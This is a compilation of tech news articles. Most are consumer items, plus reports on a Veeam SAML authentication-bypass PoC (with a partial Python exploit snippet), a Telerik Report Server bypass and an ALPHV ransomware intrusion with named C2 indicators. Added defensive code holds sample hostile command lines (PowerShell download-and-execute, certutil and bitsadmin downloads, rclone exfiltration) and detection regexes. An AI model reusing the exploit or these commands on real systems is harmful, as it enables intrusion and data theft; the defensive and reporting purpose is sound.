Apple is now the home of one of the most popular book clubs

Apple’s e-book reading app has just become the official audiobook home of one of the most popular book clubs, Reese’s Book Club. Founded by iconic American actress and producer Reese Witherspoon, the book club puts women at the center of stories each month.

The partnership between Apple Books and Reese Witherspoon involves a dedicated page for users to follow to be notified about new monthly picks, which will be featured on Apple’s app.

This dedicated page also allows users to browse books from previous months that were spotlighting women, as well as get access to themed editorial collections curated exclusively by Apple and Reese’s Book Club editors.

But wait, there’s more! Apple announced that its Books app will offer exclusive pricing promotions. On top of that, authors from Hello Sunshine, another company founded by Reese Witherspoon that aims to empower women, will curate audiobook recommendations, helping readers choose from more stories that will be revealed only on Apple Books.

Starting this week, Apple Books users can find Reese’s Book Club in the app and learn more about the latest selection, including the newly announced pick for June, which is “The Unwedding,” by number 1 New York Times bestselling author Ally Condie.

This is not the first time that Apple and Reese Witherspoon teamed up for a project. Reese’s Hello Sunshine has already produced the Apple TV+ original series The Last Thing He Told Me, which was renewed for season two, and the Critics Choice Award-winning series “The Morning Show,” among other things.


Poc Exploit Released For Veeam Authentication Bypass Vulnerability


A proof-of-concept (PoC) exploit has been released for a critical authentication bypass vulnerability in Veeam Backup Enterprise Manager.

The vulnerability, identified as CVE-2024-29849, has a CVSS score of 9.8, indicating its high severity.

This article delves into the details of the vulnerability, the exploit, and the potential implications for organizations using Veeam’s software. 

On May 21, 2024, Veeam published an advisory regarding CVE-2024-29849, a critical authentication bypass vulnerability in Veeam Backup Enterprise Manager.

This flaw allows an unauthenticated attacker to log in to the Veeam Backup Enterprise Manager web interface as any user, effectively bypassing all authentication mechanisms.

The vulnerability resides in the Veeam.Backup.Enterprise.RestAPIService.exe, a REST API server component of the Veeam Backup Enterprise Manager software.

This service listens on TCP port 9398 and serves as an API version of the main web application, which operates on TCP port 9443. 


Technical Analysis of the Exploit

The PoC exploit, developed by Sina Kheirkhah of the Summoning Team, leverages the vulnerability by manipulating the Veeam.Backup.Enterprise.RestAPIService.CEnterpriseRestSessionManagerControllerStub.LogInAfterAuthentication method.

This method is executed when an authentication request is received, and the exploit targets specific checks and conditions within this method to bypass authentication.

The exploit involves crafting a malicious SAML assertion and sending it to the vulnerable Veeam service.

The SAML assertion is designed to trick the service into validating the token and granting access to the attacker.

The exploit script, written in Python, automates this process and includes a callback server to handle the malicious SAML assertion.

Diagram illustrating the authentication bypass exploit process.

Proof of Concept (PoC) Code

The PoC code for the exploit has been made publicly available, allowing security researchers and potentially malicious actors to understand and replicate the attack.

Below is a snippet of the PoC code:

from http.server import HTTPServer, SimpleHTTPRequestHandler
import ssl
import warnings
import base64
import requests
from urllib.parse import urlparse
from threading import Thread
import os

warnings.filterwarnings("ignore", category=DeprecationWarning)
requests.packages.urllib3.disable_warnings()

class CustomHandler(SimpleHTTPRequestHandler):
    # Answers the service's SAML callback with an unsigned assertion whose
    # Issuer is simply the callback host itself.
    def do_POST(self):
        xml_response = '''<saml2:Assertion xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion">
                            <saml2:Issuer>https://192.168.253.1/STSService</saml2:Issuer>
                            <saml2:Status>
                                <saml2:StatusCode Value="http://docs.oasis-open.org/ws-sx/ws-trust/200512/status/valid"/>
                            </saml2:Status>
                          </saml2:Assertion>'''
        self.send_response(200)
        self.send_header("Content-type", "text/xml")
        self.end_headers()
        self.wfile.write(xml_response.encode("utf-8"))
        print("(+) SAML Auth request received, serving malicious RequestSecurityTokenResponseType")

def start_callback_server(ip, port):
    # HTTPS listener; server.pem and key.pem are the callback host's own certificate and key.
    httpd = HTTPServer((ip, port), CustomHandler)
    ssl_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    ssl_context.load_cert_chain("server.pem", keyfile="key.pem")
    httpd.socket = ssl_context.wrap_socket(httpd.socket, server_side=True)
    print(f"(*) Callback server listening on https://{ip}:{port}")
    httpd.serve_forever()

# Additional code for exploit execution...
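What the callback server above hands back is an assertion that is unsigned and whose Issuer is whatever host answered the request. As an added example, not code from this article or from the PoC author, the following shows the generic relying-party checks under which such an assertion must fail: the issuer is compared with a pinned allow-list, a signature is required before the token is believed, and only then is the subject read. The trusted issuer URL, the sample assertions and the verify_signature hook are assumptions constructed for the example; it illustrates the class of check, not Veeam's own code.

```python
import xml.etree.ElementTree as ET

SAML_NS = "urn:oasis:names:tc:SAML:2.0:assertion"
DS_NS = "http://www.w3.org/2000/09/xmldsig#"

# Assumption for this example: the relying party pins the one STS it was configured with.
TRUSTED_ISSUERS = {"https://sts.corp.example/STSService"}


class AssertionRejected(Exception):
    """Raised with the reason an assertion failed validation."""


def validate_assertion(xml_text, trusted_issuers=TRUSTED_ISSUERS, verify_signature=None):
    """Return the asserted subject (NameID) or raise AssertionRejected.

    verify_signature(root, signature_element) -> bool is a hook for a real
    XML-DSig check (for instance with the xmlsec library against the pinned
    STS certificate); this example only enforces that a Signature is present.
    """
    # ElementTree does not fetch external entities, but for untrusted XML in
    # production prefer defusedxml over the stdlib parser.
    root = ET.fromstring(xml_text)
    if root.tag != f"{{{SAML_NS}}}Assertion":
        raise AssertionRejected("not a SAML 2.0 Assertion")

    # 1. The issuer must be one we were configured to trust. A token whose
    #    Issuer is the host that answered our callback proves nothing.
    issuer = (root.findtext(f"{{{SAML_NS}}}Issuer") or "").strip()
    if issuer not in trusted_issuers:
        raise AssertionRejected(f"untrusted issuer {issuer!r}")

    # 2. Validity comes from a signature we can verify, not from a
    #    StatusCode inside the token that says "valid".
    signature = root.find(f"{{{DS_NS}}}Signature")
    if signature is None:
        raise AssertionRejected("assertion is unsigned")
    if verify_signature is not None and not verify_signature(root, signature):
        raise AssertionRejected("signature did not verify")

    # 3. Only now read the identity we are about to log in as.
    name_id = root.findtext(f"{{{SAML_NS}}}Subject/{{{SAML_NS}}}NameID")
    if not name_id:
        raise AssertionRejected("no Subject/NameID")
    return name_id.strip()


# Constructed: the shape of assertion the PoC callback serves, unsigned and
# with an Issuer chosen by the callback host.
POC_STYLE_ASSERTION = """<saml2:Assertion xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion">
  <saml2:Issuer>https://192.168.253.1/STSService</saml2:Issuer>
  <saml2:Status>
    <saml2:StatusCode Value="http://docs.oasis-open.org/ws-sx/ws-trust/200512/status/valid"/>
  </saml2:Status>
</saml2:Assertion>"""

# Constructed: a legitimate assertion from the pinned STS (the signature
# value is a placeholder; a real one is checked by the verify_signature hook).
SIGNED_ASSERTION = """<saml2:Assertion xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion"
                 xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
  <saml2:Issuer>https://sts.corp.example/STSService</saml2:Issuer>
  <ds:Signature><ds:SignatureValue>PLACEHOLDER-BASE64</ds:SignatureValue></ds:Signature>
  <saml2:Subject><saml2:NameID>alice</saml2:NameID></saml2:Subject>
</saml2:Assertion>"""

# Constructed: trusted issuer, but the signature has been stripped.
UNSIGNED_TRUSTED_ASSERTION = """<saml2:Assertion xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion">
  <saml2:Issuer>https://sts.corp.example/STSService</saml2:Issuer>
  <saml2:Subject><saml2:NameID>alice</saml2:NameID></saml2:Subject>
</saml2:Assertion>"""


def check(xml_text, **kwargs):
    """Convenience wrapper: ('ok', subject) or ('rejected', reason)."""
    try:
        return ("ok", validate_assertion(xml_text, **kwargs))
    except AssertionRejected as exc:
        return ("rejected", str(exc))


if __name__ == "__main__":
    for label, doc in [("PoC-style", POC_STYLE_ASSERTION), ("signed", SIGNED_ASSERTION),
                       ("unsigned-trusted", UNSIGNED_TRUSTED_ASSERTION)]:
        print(label, check(doc))
```

The order of the checks matters: the issuer and signature are established before any field of the token is acted on, so a token that merely claims a valid status never reaches the login step.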
Figure 2: Snippet of the PoC exploit code.

Implications and Mitigation

The release of this PoC exploit underscores the critical nature of CVE-2024-29849.

Organizations using Veeam Backup Enterprise Manager are at significant risk if they do not apply the necessary patches and mitigations.

An attacker exploiting this vulnerability could gain unauthorized access to sensitive data and systems, leading to potential data breaches and other security incidents.

Veeam recommends updating immediately to the latest version of the software, which includes the patch for this vulnerability.

Additionally, organizations should review their security configurations and consider implementing additional layers of security, such as multi-factor authentication (MFA) and network segmentation, to mitigate the risk of exploitation. 

The discovery and public release of the PoC exploit for CVE-2024-29849 highlight the ongoing challenges in securing enterprise software.

It reminds organizations to stay vigilant, keep their systems updated, and adopt robust security practices to protect against emerging threats.




iPhone 16 battery leak shows larger capacity & metal casing


Many people complained about the overheating issue of the iPhone 15 series. Apple promised to solve the overheating problem through software updates. However, the issue still persists for many users. The problem could be due to the hardware design of the previous model.

iPhone 16 battery leak shows metal casing & bigger capacity

Now a leak from tipster Majin Bu on X has revealed the battery of the iPhone 16. The image suggests that Apple doesn’t want to make the same mistake with the iPhone 16 series. According to the leak, the battery of the iPhone 16 will have a metal case around the soft plastic pouch. The metal casing should help dissipate heat from the battery. It should be especially helpful when the phone is charging, as this is the scenario in which the battery cell heats up the most.

The battery has a similar shape, but the engraving on the metal casing shows “3597mAh”. For context, the iPhone 15 has a smaller 3349 mAh battery.

The leaked images of the iPhone 16 battery show a frosted finish on the case. Apple has also redesigned the connectors. Apple reportedly opted for a glossy surface for the metal casing at first but later on decided to go for a frosted finish.

The use of a hard case for the batteries was first leaked in November by tipster @KosutamiSan. He also claimed that the iPhone 16 series will switch to a graphene thermal system, as it offers excellent thermal conductivity (better than copper).

The latest leak is about the base iPhone 16. However, the tipster @KosutamiSan already shared leaked images of the iPhone 16 Pro battery back in April this year. According to the leak, the battery for the iPhone 16 Pro also has a frosted metal casing and a capacity of 3355mAh. This is around a 2.4% increase as compared to the iPhone 15 Pro.

iPhone 16 could use a different battery technology or it could be heavier

iPhones had been getting heavier, and Apple had to address that. It replaced the stainless steel middle frame of the Pro models with titanium to reduce the weight. As a result, the iPhone 15 Pro became significantly lighter (187g) than its predecessor (206g).

While the iPhone 15 (171g) weighs about the same as its predecessor, the extra metal inside the iPhone 16 may significantly increase the weight. A higher battery capacity will also contribute to the increased weight.

Nonetheless, we can only observe the exterior of the battery pack. Apple might be using a different battery technology with higher energy density, as seen in some book-style foldables.

This is plausible since the metal casing increases the battery’s thickness, which could require a redesign of the internal components or result in a thicker phone.



Best of Computex 2024: MSI X870 Motherboards


MSI’s new motherboards are stronger and easier to assemble than ever before

At Computex this week in Taiwan, MSI introduced the X870 motherboards, which perfectly complement the new AMD Ryzen 9000 lineup of processors. They also include PCIe Gen 5.0 and M.2 slots, which makes for a great experience in both graphics and storage.

While we don’t yet have pricing or availability for the MSI X870 motherboards, we do know that these will be some of the best motherboards launching this year, which is why the MSI X870 motherboards have earned a Best of Computex 2024 award from Android Headlines.

MSI includes cutting-edge technologies in the new X870 motherboards

As you’d expect from a brand new lineup of motherboards, MSI is supporting the most cutting-edge technologies, including USB 4 connectivity, which will offer speeds of up to 40GB per second. The lineup includes the MAG X870 TOMAHAWK WiFi and PRO X870-P WiFi, both with cutting-edge 5G LAN, WiFi 7, and Bluetooth 5.4. Basically, it is the latest and greatest tech that will be available in 2024.

When these motherboards become available – likely later this year – they are definitely going to be the ones you want to put in your rig. MSI is also focusing on ease of assembly with these new motherboards. GPUs getting larger and heavier can be a strain on the motherboard, so MSI is offering three additional anchor points and using a thicker material for the PCIe slots, which should solve that problem. These are 121% stronger than previous-gen solutions, and the slots are able to withstand twice the graphics-card weight of before.

Continuing with the ease of assembly theme, MSI has also made it even easier to install an M.2 SSD into your rig with the X870. Just a simple push locks the M.2 SSD into place, and removing it is as simple as a slight pull to the left. It really can’t get any easier than that.

MSI uses cutting-edge technologies and makes installation and upgrades a piece of cake with the X870 motherboards. That’s why we have awarded these new motherboards the Best of Computex 2024 award.



Google Messages changes the way drafts behave with new update (or is it a bug?)


Google apps are constantly getting updates and little tweaks. The latest one for Google Messages changes the way message drafts behave.

Previously, when you entered text in the compose field but didn’t send it, it would be reflected on the main conversation list. And the thread would be moved up the page, while your text would appear in italics.

Now, with the latest update to Google Messages (version 20240521_00_RC01), and also in the beta version (20240531_00_RC00), that preview no longer appears. The thread will still move up the list, but apart from that, you don’t see any indication that you have a drafted message in there. It even looks a bit confusing, because the last message from the contact shows up with an updated date instead of “Draft” next to your message.


It seems like this could be a bug instead of a feature. It doesn’t make the experience better; it can actually generate quite a lot of confusion. Hopefully this will be fixed and is not by design, but it is not clear at the moment whether it’s a bug.

Recent features that were removed from Google Messages like reminders or message organization (Personal + Business) indicate this could be another feature removal… but it personally doesn’t make much sense. I’m inclined to say this is indeed a bug, but info on it is scarce at the moment. We have to wait and see what happens!



Critical Auth Bypass Flaw Affected Progress Telerik Report Server


Progress patched a critical authentication bypass flaw impacting its Telerik Report Server. The vulnerability appeared after Progress tried to address another vulnerability, and an authorization bypass became possible. Users must update to the latest release to receive the fix.

PoC Shared For Progress Telerik Report Server Flaw

In a recent post, security researcher Sina Kheirkhah explained that he, together with fellow researcher Soroush Dalili, developed an exploit for a patched vulnerability in Progress Telerik Report Server.

As explained, the vulnerability, now identified as CVE-2024-4358, is an authentication bypass for the previously reported flaw CVE-2024-1800.

Regarding CVE-2024-1800, this vulnerability made it to the news when Progress disclosed it as a remote code execution vulnerability. According to the ZDI’s advisory, the issue appeared because of insecure deserialization, and exploiting this vulnerability required authentication.

This flaw initially received a CVSS score of 8.8, and it affected Telerik Report Server versions prior to 2024 Q1 (10.0.24.130). Progress deployed a patch for it with Report Server 2024 Q1 (10.0.24.305), asking users to upgrade to this or later versions.

However, the two researchers devised a way to bypass this authentication restriction, eventually raising its CVSS to 9.9, and receiving a new identification, CVE-2024-4358.

Specifically, they observed a flaw in the implementation of the Register method. Because of a lack of validation of the current installation setup, an unauthenticated adversary could exploit the flaw and receive “System Administrator” privileges.

Once an adversary gains admin privileges, exploiting the deserialization issue to achieve full RCE becomes trivial.

The researcher has explained the technical details about the vulnerabilities, alongside sharing the PoC exploit, in his post.

Progress Patched The Vulnerability

Following the responsible disclosure from the researchers, Progress patched the vulnerability and shared a detailed advisory to help the users patch their systems.

As elaborated, the vulnerability affected Report Server version 2024 Q1 (10.0.24.305), which the vendor patched with the release of Report Server 2024 Q2 (10.1.24.514). To avoid potential exploits, users must update to this or a later Report Server version.

Nonetheless, where applying an immediate update isn’t possible, Progress recommends implementing a URL rewrite technique as a temporary mitigation.

In addition, they also advised users to look for any new local accounts in the Report Server users’ list via {host}/Users/Index to ensure no malicious accounts exist.

Let us know your thoughts in the comments.



Support page reveals details about Android’s Instant Hotspot feature


Google announced a new tool called the Instant Hotspot for Android devices in a Feature Drop last month. The feature lets you instantly connect to another device’s internet connection with just a single click. This becomes possible thanks to the new cross-device services feature that will come to Android soon.

Google has now shared more information about the Android Instant Hotspot feature through the official support page.

How to enable the Instant Hotspot feature in Android?

Instant Hotspot requires the host device (that is sharing the network) and all the devices that will join the network (clients) to be signed into the same Google account. In addition to that, Android’s new cross-device services should also be enabled. The feature is currently not active on any Android device.

After signing into the same Google account and enabling cross-device services, you will need to go to Settings > Google > All services > Devices & sharing > Cross-device services on all of the devices. Under the “What your devices can do” heading you will need to select Internet sharing. You’ll also want to make sure that Internet sharing and Instant hotspot are both enabled here.

Finally, if one of the devices isn’t connected to the internet and is within range of another with an internet connection, it will show a pop-up notification. By tapping on the notification you will be able to instantly connect the client to the host device.

While there is an initial setup process for all your devices, the feature enables seamless connectivity once it’s set up. At present you need to reach the host device and activate the hotspot each time you want to use it.

However, not every device is treated equally

This feature is only available for Android 11 and later versions. In addition to that, Samsung users do not get to experience this feature. “If you have a Samsung device, you can use the Auto Hotspot feature instead,” notes the support page.

Android Go devices won’t support this feature either. For those unfamiliar, it is a lightweight version of the Android operating system designed for low-end and budget smartphones with limited hardware resources.



Best of Computex 2024: GPD Duo


Two identical displays in a 13-inch laptop form factor.

GPD is a company often mentioned in relation to small laptops. Many of you have probably heard of it, and the company made an appearance at Computex this year. As part of the show, the company teased its upcoming device. The device in question is the GPD DUO, and due to its potential, we’ve decided to send one of our awards GPD’s way. The company did share an image of the device and some of its details, even though it was not fully revealed during the show. More details are expected to come very soon, though.

The GPD DUO offers two displays in a compact form factor

So, what’s so special about the GPD DUO? Well… its displays. Yes, you read that right, plural. The GPD DUO will come with two displays, which you will be able to use in several ways. You’ll be able to stack them one above the other, or place them side by side. If you don’t want to use the second panel at any given time, you simply flip it all the way over and forget it’s there. You can basically use your laptop while playing something else for someone on the second screen, facing the other side. If you need more screen real estate, that’s not a problem: simply stack them one on top of the other.

The Microsoft Surface Pen stylus is compatible with this laptop

That’s not all, though. There’s one more use case… a tablet use case. You can close the lid on the GPD DUO, and still have one display available on the outside, in case you’d like to use it in a tablet form. Yes, this is a touchscreen, and it supports a 10-point touch input. On top of that, it’s compatible with the Surface Pen stylus and supports 4,096 levels of pressure sensitivity with that stylus (the MPP protocol). This laptop can be used for design purposes this way, without a problem.

Two 13.3-inch Samsung-made OLED displays are used

The size could be the key here. The GPD DUO features two 13.3-inch OLED displays. When folded, it’s the size of an A4 sheet of paper, says GPD. It’s, of course, a lot thicker, but its height and width are very manageable. The fact it can unfold into a dual-screen setup could come in handy for many people. A 13-inch laptop size is still preferred by many, but you’re getting the best of both worlds here. Not only are you getting a manageable laptop in terms of size, but two displays on it too. GPD is using Samsung’s AMOLED panels here, by the way.

There’s a lot of potential in this laptop and its form factor, and GPD has plenty of experience in the field. We’re all waiting for more information about the GPD DUO.



Another Google app bites the dust in the US


Google’s library of defunct apps and services is getting bigger each year. The search giant revealed at the beginning of 2024 that it will shut down the GPay app in the United States.

That means that starting June 4, GPay is no longer available in the United States. If you try to log in, you’ll be met with a message that informs you about the changes: “The Google Pay US app is no longer available. You can still tap to pay using the Google Wallet.”

The message is also meant to provide GPay users with an alternative in case they didn’t know already. Google Wallet is now the company’s main mobile payment app, at least until the company changes its mind and decides to discontinue the app and/or the payment system.

Besides GPay no longer working in the United States, Google also removed peer-to-peer payments. As per 9to5google’s report, users can still use the Google Pay website to view and transfer their balance to a bank account after June.

The changes made by Google this month will mostly affect those with multiple accounts who used GPay for its peer-to-peer functionality. The rest probably won’t feel its absence that much, since they can just switch to Google Wallet (if they haven’t already).


ALPHV Ransomware Deployment Started With RDP Access & ScreenConnect


Ransomware is used by hackers to abuse victims’ data, locking it until a ransom is paid.

This method of cyber attack is profitable because it takes advantage of how close and vital data is to individuals and companies, leaving them little choice but to pay for a quick return.

The intrusion started with an email delivering a forked IcedID variant focused on payload delivery.

After gaining initial access, the intruder installed ScreenConnect on the computer for remote control, deployed Cobalt Strike beacons, and used the CSharp Streamer RAT to harvest credentials and move laterally to domain controllers and servers.

During the discovery phase, sensitive information was collected with ‘confucius_cpp,’ a custom tool, and then exfiltrated with rclone.


For eight days, they performed a systematic deployment of ScreenConnect installers across hosts using WMI before finally delivering ALPHV ransomware payloads after deleting backups.

ALPHV Ransomware Deployment

The malicious spam email, which tricked the victim into downloading and unzipping an archive containing a readme and a Visual Basic Script (VBS), served as the initial access vector.

Running the VBS executed an embedded, obfuscated IcedID loader DLL, which dropped and ran a second IcedID DLL payload, completing the infection chain, according to the DFIR Report.

This is consistent with known malicious activity in which the same technique was used to distribute an IcedID fork focused on payload delivery rather than banking fraud.

The threat actor deployed ScreenConnect remote access tools using disguised installation programs that operated through wmiexec and RDP sessions.

Several techniques were employed to retrieve Cobalt Strike beacons, including bitsadmin, certutil, and PowerShell.

The CSharp Streamer RAT maintained persistence via scheduled tasks and was used for LSASS credential dumping, lateral movement, and C2 communications.

IcedID ensured its persistence by using scheduled tasks, while ScreenConnect was made persistent across reboots.

Process injection into winlogon.exe and rundll32.exe was observed during lateral movement. The actor deleted the renamed installers afterwards.

Lateral movement (Source – The DFIR Report)

Key activities included LSASS credential dumping, which was validated through memory analysis, and a DCSync performed from the beachhead against a domain controller for credential harvesting.

This was followed by the threat actor conducting initial reconnaissance using native Windows utilities launched through IcedID, and subsequently using ScreenConnect for further reconnaissance commands.

Network scanning with SoftPerfect NetScan took place on different days, targeting IP ranges and the ports for RPC, SMB, RDP, and Veeam backups.

ScreenConnect installers were then copied laterally via SMB and deployed with wmiexec.py to obtain remote control. The attacker made extensive use of RDP for lateral movement, including proxying through CSharp Streamer.

Before exfiltration, a custom tool called confucius_cpp enumerated systems by LDAP query, accessed shares based on keywords, and compressed sensitive information. The attacker also opened documents using the Firefox installation.

C&C (Source – The DFIR Report)

The threat actor leveraged multiple tools during the intrusion:

  • IcedID for initial access communicating with modalefastnow[.]com
  • Cobalt Strike beacons across hosts connecting to tracked C2 infrastructure
  • CSharp Streamer RAT at 109.236.80.191 using WebSockets over rotating ports
  • ScreenConnect remote access tools deployed via renamed binaries executed through wmiexec.py

Firefox was used to preview documents and to download rclone, which was then executed through a VBS script for data exfiltration.

The final payload was ALPHV ransomware, staged on the backup server then deployed across hosts via xcopy and WMI-initiated execution after deleting backups. 

Note (Source – The DFIR Report)

A ransom note referencing the group’s Twitter was left post-encryption.
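The intrusion above leaves a recognisable trail in process-creation and network telemetry: a VBS launched from a user directory, bitsadmin/certutil/PowerShell downloads, the output redirection that wmiexec.py produces when it runs a command, scheduled-task creation, rclone transfers, xcopy staging of an executable, and connections to the named C2 infrastructure. As an added example, not from the DFIR Report or this article, the script below runs a small set of such rules over constructed sample events. The event layout ("host | user | image | command line"), the hostnames, users, paths and the 203.0.113.10 download host are all constructed for the example; the two C2 indicators (modalefastnow[.]com and 109.236.80.191) are the ones named in the article.

```python
import re

# Constructed sample process-creation events in a simplified
# "host | user | image | command line" layout (an assumption for this example,
# not a real Sysmon/EDR export). Hosts, users and paths are made up; the
# download host 203.0.113.10 is a documentation address.
SAMPLE_EVENTS = [
    r"srv01 | CORP\jdoe | C:\Windows\System32\wscript.exe | wscript.exe C:\Users\jdoe\Downloads\readme\invoice.vbs",
    r"srv01 | CORP\jdoe | C:\Windows\System32\bitsadmin.exe | bitsadmin /transfer upd /download /priority high http://203.0.113.10/b.png C:\ProgramData\b.dll",
    r"srv01 | CORP\jdoe | C:\Windows\System32\certutil.exe | certutil -urlcache -split -f http://203.0.113.10/c.txt C:\ProgramData\c.dll",
    r"srv01 | CORP\jdoe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a')",
    r"dc01 | CORP\svc_backup | C:\Windows\System32\cmd.exe | cmd.exe /Q /c C:\Windows\Temp\update.exe /silent 1> \\127.0.0.1\ADMIN$\__1716300000.12 2>&1",
    r"srv02 | CORP\svc_backup | C:\Windows\System32\schtasks.exe | schtasks /create /tn Updater /tr C:\ProgramData\streamer.exe /sc onlogon",
    r"bkp01 | CORP\svc_backup | C:\Users\svc_backup\rclone.exe | rclone copy D:\Shares\Finance remote:exfil --transfers 32",
    r"bkp01 | CORP\svc_backup | C:\Windows\System32\xcopy.exe | xcopy \\bkp01\share$\locker.exe C:\Windows\Temp\ /Y",
    r"srv03 | CORP\jdoe | C:\Program Files\App\app.exe | app.exe --sync",  # benign
]

# Constructed network/DNS events in a "host | dest" layout (same caveat).
SAMPLE_NET_EVENTS = [
    "srv01 | dns modalefastnow.com",
    "srv01 | tcp 109.236.80.191:8443",
    "srv02 | tcp 109.236.80.191:9001",
    "srv03 | dns update.microsoft.com",
]

# Indicators named in the article (defanged there with [.]).
C2_IOCS = {"modalefastnow.com", "109.236.80.191"}

# One regex per behaviour described in the report. wmiexec.py runs commands
# through cmd.exe and redirects output to \\127.0.0.1\ADMIN$\__<timestamp>,
# which is the artefact the "wmiexec_output_redirect" rule keys on.
RULES = {
    "vbs_from_user_dir": re.compile(r"\b[wc]script(\.exe)?\b.*\\Users\\.*\.vbs\b", re.I),
    "lolbin_download": re.compile(
        r"\bbitsadmin(\.exe)?\s+/transfer\b|\bcertutil(\.exe)?\s+-urlcache\b"
        r"|downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.I),
    "wmiexec_output_redirect": re.compile(r"\\\\127\.0\.0\.1\\ADMIN\$\\__\d+", re.I),
    "schtasks_persistence": re.compile(r"\bschtasks(\.exe)?\s+/create\b", re.I),
    "rclone_exfil": re.compile(r"\brclone(\.exe)?\s+(copy|sync|move)\b", re.I),
    "xcopy_executable_staging": re.compile(r"\bxcopy(\.exe)?\b.*\.exe\b", re.I),
}


def scan_process_events(events, rules=RULES):
    """Return {rule_name: [matching event lines]} for every rule that fired."""
    hits = {}
    for line in events:
        for name, pattern in rules.items():
            if pattern.search(line):
                hits.setdefault(name, []).append(line)
    return hits


def match_c2_iocs(net_events, iocs=C2_IOCS):
    """Return the network events whose destination is a known C2 indicator."""
    return [line for line in net_events if any(ioc in line for ioc in iocs)]


def hosts_by_rule(hits):
    """Map each fired rule to the sorted hosts it fired on, for scoping the incident."""
    return {name: sorted({line.split(" | ")[0] for line in lines})
            for name, lines in hits.items()}


if __name__ == "__main__":
    hits = scan_process_events(SAMPLE_EVENTS)
    scope = hosts_by_rule(hits)
    for name, lines in hits.items():
        print(f"[{name}] {len(lines)} hit(s) on {scope[name]}")
    for line in match_c2_iocs(SAMPLE_NET_EVENTS):
        print("[c2_ioc]", line)
```

Grouping hits by host is the useful part for scoping: in the sample, the download activity is confined to the beachhead (srv01) while the wmiexec artefact appears on the domain controller, which mirrors the beachhead-to-DC movement the report describes.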


